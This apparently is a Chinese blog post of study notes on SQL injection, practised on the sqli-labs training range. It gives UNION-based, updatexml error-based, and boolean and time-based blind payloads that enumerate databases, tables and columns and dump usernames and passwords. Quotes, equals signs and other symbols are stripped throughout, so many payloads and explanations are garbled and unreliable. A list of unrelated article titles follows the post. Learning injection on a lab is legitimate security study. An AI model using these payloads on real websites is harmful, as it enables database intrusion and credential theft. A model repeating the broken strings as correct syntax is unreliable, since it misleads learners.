当前位置：首页 > article >正文

日常记录：SQL学习总结

article 2026/5/15 8:49:09

一、什么是SQL注入SQL注入就是通过把恶意SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串最终达到欺骗服务器使数据库执行恶意SQL命令目的的入侵行为。关键闭合原有 SQL 语句构造恶意新语句。二、SQL注入漏洞分类三、常见函数报错函数extractvalue、updatexml、exp、GTID_SUBSET()等。截取函数left、mid、substrsubstring、substrB。判断函数if、case when。其他函数ascii、length。数据库常见函数四、SQL手工注入实操一完整手动注入步骤1.判断是否存在 SQL 注入手动测试输入字段在Web应用的输入字段如登录框、搜索框中尝试输入特殊字符或SQL片段观察系统响应。常见的测试输入包括单引号、双引号、分号;或逻辑运算符如OR 11。如果系统返回数据库错误信息或异常行为可能存在漏洞。判断注入点闭合方式以sqli靶场做练习范例第一关输入?id1会发现有报错程序无法正常从数据库中查询出数据就会抛出异常和回显从回显就能推测数据库中应该是id$id 这就是字符型。输入?id1 and 11页面有返回输入?id1 and 12页面有返回第二关输入?id1有报错从回显能推测数据库中应该是id$id,这就是数字型。输入?id1 and 11输入?id1 and 122.判断字段数第一关为例用order by?id1order by 4--?id1order by 3--确定列数为33.确定回显位置这里用union select?id-1 union select 1,2,3--能够确定2,3回显位4.爆库名 → 爆表名 → 爆字段名 → 爆数据二常见SQL注入方式联合查询注入使用UNION的注入这种情况多半是有回显的时候。?id-1 union select 1,database(),user()--爆库名?id-1union select 1,2,group_concat(schema_name) from information_schema.schemata--//查询所有的数据库的名字爆表名?id-1union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schemasecurity)--//查询security库里所有表名爆字段名?id-1union select 1,2,(select group_concat(column_name) from information_schema.columns where table_nameusers)--//查询users表的列名 (因为我们安装过dvwa所以这里查询的users表有两个一个dvwa里面的users表一个是sqli里面的users表故爆出的列名很多。)解决方法指定数据库、数据表?id-1union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers)--爆数据?id-1union select 1,2,(select group_concat(username,~,password) from security.users)--//查询users表里的数据得到所有的用户名、密码报错注入mysql5.1.5版本中添加了extractvalue()、updatexml()函数它们两个分别能够对XML文档进行查询、修改操作。SQL报错注入的应用当使用extractvalue(xml_frag, xpath_expr)函数时若xpath_expr参数不符合xpath格式就会报错。而~符号(ascii编码值0x7e)是不存在xpath格式中的所以一旦在xpath_expr参数中使用~符号就会产生xpath syntax error (xpath语法错误)通过使用这个方法就可以达到报错注入的目的。爆库名报错函数用updatexml():为例?id-1 and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)--报错已经成功爆出了部分数据库名但因为updatexml/extractvalue有32 字符长度限制所以内容被截断了。用right()从后面截取?id-1 and updatexml(1,concat(0x7e,right((select group_concat(schema_name) from information_schema.schemata),30),0x7e),1)--这样就查到所有库名爆表名?id-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemasecurity)),1)--//查询security库下所有表名爆字段名?id-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers)),1)-- //查询users表下所有字段名爆数据因为报错显示位有限用limit来看每个账户和密码?id-1 and updatexml(1,concat(0x7e,(select concat(username,^,password) from security.users limit 7,1)),1)--盲注注入布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。判断数据库名的长度?id1and length((select database()))9--利用bp抓包爆破出来数据库名长度为8?id1and%20substr(database(),3,1)c数据库名字是security时间盲注界面返回值只有一种,true 无论输入任何值返回情况都会按正常的来处理。加入特定的时间函数sleep通过查看web页面返回的时间差来判断注入的语句是否正确。?id-1||if(substr(database(),1,1)1,sleep(10),sleep(0))-- //查数据库名1、and length((select database()))8//判断当前数据库长度2、and length((select group_concat(table_name) from information_schema.tables where table_schemasecurity))29//判断所有表的长度3、and length((select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers))20//判断users表中字段的长度4、and length((select concat(username,password) from security.users limit 7,1))10 //判断user表第八行数据总位数username、password得到相应的长度后使用bp爆破相应的数据and substr((select concat(username,password) from security.users limit 7,1),1,1)aUA注入/referer注入/dnslog外带cookie注入宽字节注入堆叠注入

日常记录：SQL学习总结

相关文章：

日常记录：SQL学习总结

生物记录仪能耗优化：机器学习与传感器融合实践

SwarmVault：去中心化AI数据存储与管理的实践指南

3分钟解决Windows热键冲突：Hotkey Detective让你重掌键盘控制权

AKTools深度解析：3分钟构建跨语言金融数据API的实战指南

【信息科学与工程学】【通信工程】第一百二十二篇数字通信函数01

Revelation光影包：5分钟打造电影级Minecraft视觉体验

Midjourney Pro订阅值不值得？深度拆解12项独家能力与企业级工作流增效实测数据

MTEB 排行榜之外：嵌入模型在 JRXML 场景下的选择逻辑

【Langchain】 ChatPromptTemplate：从“手动拼字符串“到“专业模板“的进化之路

LizzieYzy：围棋AI分析的终极免费工具，5分钟快速上手

基于SDR与FPGA的全栈开源Wi-Fi设计：openwifi架构解析与实战

百度网盘直链解析终极指南：5分钟告别限速下载的完整教程

LaTeX-PPT：如何在PowerPoint中3分钟实现专业数学公式排版

大语言模型角色扮演：从提示工程到智能体框架的完整指南

【权威实测】Perplexity UI v2.8.3组件查询API响应延迟骤降76%的6项必调参数

终极免费Cookie导出工具：Get cookies.txt LOCALLY完整使用指南

NoSleep：3种工作模式，解决Windows自动休眠的9大场景难题

Rust实现PDF解析与渲染：pdf_oxide库的安全高性能实践

AI应用技术栈迁移实战：从框架切换、模型替换到向量库迁移

dnSpyEx .NET 8调试兼容性深度解析与实战指南

烟花爆竹安全禁令（零售篇）

NovelClaw：基于Python的异步小说采集框架设计与实战

Umami MCP服务器：连接网站分析与AI工作流的标准化桥梁

抖音直播弹幕数据抓取实战：5分钟搭建实时监控系统

TypeScript函数式编程实战：fp-ts生产级应用技巧与模式解析

如何快速解决城通网盘下载限速问题：ctfileGet完整使用指南

day15 C语言指针3

C语言实战：从零构建2048游戏，掌握核心算法与图形编程

基于大语言模型的塔罗牌AI解读系统：技术架构与实现详解